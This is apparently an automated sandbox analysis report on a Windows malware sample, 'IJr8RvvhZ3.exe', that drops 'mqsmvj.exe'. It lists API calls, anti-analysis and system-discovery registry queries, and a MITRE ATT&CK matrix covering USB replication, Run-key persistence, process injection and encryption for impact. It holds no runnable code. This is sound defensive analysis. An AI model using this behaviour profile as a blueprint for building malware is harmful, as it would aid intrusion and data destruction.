Code function: 0_2_0F143200 lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,GetProcessHeap,HeapAlloc,lstrcpyA,

0_2_0F143200

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Code function: 0_2_0F145FF0 mov eax, dword ptr fs:[00000030h]	0_2_0F145FF0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 3_2_0F585FF0 mov eax, dword ptr fs:[00000030h]	3_2_0F585FF0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 11_2_0F585FF0 mov eax, dword ptr fs:[00000030h]	11_2_0F585FF0

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe

Code function: 0_2_0F143C70 AllocateAndInitializeSid,GetModuleHandleA,GetProcAddress,FreeSid,

0_2_0F143C70

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe

Code function: 0_2_0F149200 cpuid

0_2_0F149200

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe

0_2_0F147490

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Replication Through Removable Media	11 Native API	11 Registry Run Keys / Startup Folder	1 Process Injection	1 Masquerading	OS Credential Dumping	1 Query Registry	1 Replication Through Removable Media	11 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Data Encrypted for Impact
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Software Packing	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	11 Peripheral Device Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 Account Discovery	SSH	Keylogging	Data Transfer Size Limits	1 Proxy	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Network Configuration Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	1 System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	1 File and Directory Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	44 System Information Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
IJr8RvvhZ3.exe	87%	Virustotal		Browse
